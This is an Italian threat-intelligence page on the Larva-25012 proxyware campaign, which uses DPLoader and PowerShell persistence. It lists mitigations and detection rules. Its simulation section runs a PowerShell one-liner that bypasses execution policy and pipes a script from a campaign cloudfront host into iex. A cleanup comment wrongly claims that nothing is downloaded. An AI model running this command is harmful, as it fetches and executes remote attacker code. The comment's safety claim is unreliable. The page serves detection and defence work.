SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012: Una Campagna di Distribuzione di Proxyware del 2026

Author Photo
SOC Prime Team linkedin icon Segui
Larva-25012: Una Campagna di Distribuzione di Proxyware del 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

L’attore della minaccia Larva-25012 sta distribuendo attivamente Proxyware per monetizzare i sistemi compromessi dirottando la larghezza di banda degli utenti. La campagna si basa su infezioni esistenti di DPLoader e si affida a diversi canali di distribuzione, tra cui siti web di download di YouTube e GitHub. Il malware distribuisce diverse famiglie di Proxyware, inclusi DigitalPulse, SOAX, Appsalt e IPRoyal.

Indagine

Il Centro d’Intelligence sulla Sicurezza di AhnLab (ASEC) ha monitorato l’attività di proxyjacking in corso e identificato le operazioni rinnovate di Larva-25012 nella seconda metà del 2026. L’indagine ha rilevato che gli attaccanti utilizzano varianti JavaScript e Python di DPLoader per mantenere la persistenza ed eseguire comandi PowerShell. Sono anche creati compiti pianificati per garantire che gli script dannosi continuino a essere eseguiti su sistemi compromessi.

Mitigazione

Gli utenti dovrebbero evitare di scaricare file eseguibili da siti web sospetti, annunci pop-up o piattaforme di condivisione file non ufficiali. Il software dovrebbe essere ottenuto solo da fonti affidabili e legittime, mentre app craccate e siti di download illegali dovrebbero essere evitati. Le organizzazioni dovrebbero anche mantenere le soluzioni di protezione degli endpoint, inclusi V3, completamente aggiornate.

Risposta

Quando viene rilevata un’attività sospetta, gli amministratori dovrebbero identificare e terminare i processi PowerShell dannosi e i compiti pianificati associati alle famiglie di Proxyware interessate. I sistemi dovrebbero anche essere controllati per DPLoader, che serve come componente chiave di infezione e persistenza. Controllare il traffico di rete in uscita per connessioni non autorizzate a infrastrutture C2 conosciute o sospette.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Scaricamento o Caricamento tramite Powershell (via cmdline)

Team di SOC Prime
22 Set 2026

Processi Figli NodeJS Sospetti [Windows] (via cmdline)

Team di SOC Prime
22 Set 2026

Disabilita Monitoraggio Realtime di Windows Defender e Altre Modifiche Preferenze (via cmdline)

Team di SOC Prime
22 Set 2026

Chiama Metodi .NET Sospetti da Powershell (via powershell)

Team di SOC Prime
22 Set 2026

Possibile Abuso del Dominio di Sviluppo di Cloudflare (via dns)

Team di SOC Prime
22 Set 2026

IOC (HashMd5) da rilevare: Larva-25012: Una Campagna di Distribuzione Proxyware 2026

Regole AI di SOC Prime
22 Set 2026

Rilevamento di Script di Installazione di Proxyware PowerShell [Windows Powershell]

Regole AI di SOC Prime
22 Set 2026

Esecuzione di Simulazione

  • Narrativa & Comandi di Attacco: Un avversario, tentando di installare proxyware per l’uso non autorizzato della larghezza di banda (Larva-25012), esegue una one-liner PowerShell. L’obiettivo è bypassare la scansione locale dei file scaricando il payload direttamente in memoria. Utilizzano il -ExecutionPolicy Bypass flag per garantire l’esecuzione dello script e iwr per recuperare il file da una distribuzione Cloudfront, reindirizzandolo a iex per l’esecuzione immediata. Questa specifica riga di comando è una delle firme mirate nella regola di rilevamento.

  • Script di Test di Regressione:

    # Simulazione di Installazione di Proxyware Larva-25012
    # Questo comando è specificamente progettato per corrispondere alla selezione2 nella regola di rilevamento.
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # Usiamo Start-Process per garantire che la riga di comando sia catturata come un nuovo evento di processo
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • Comandi di Pulizia:

    # Nessun file viene effettivamente scaricato a causa della natura del pipe 'iex' nella simulazione,
    # ma se fossero stati creati degli artefatti, verrebbero rimossi qui.
    Write-Host "Pulizia della simulazione completata. Nessun artefatto persistente creato."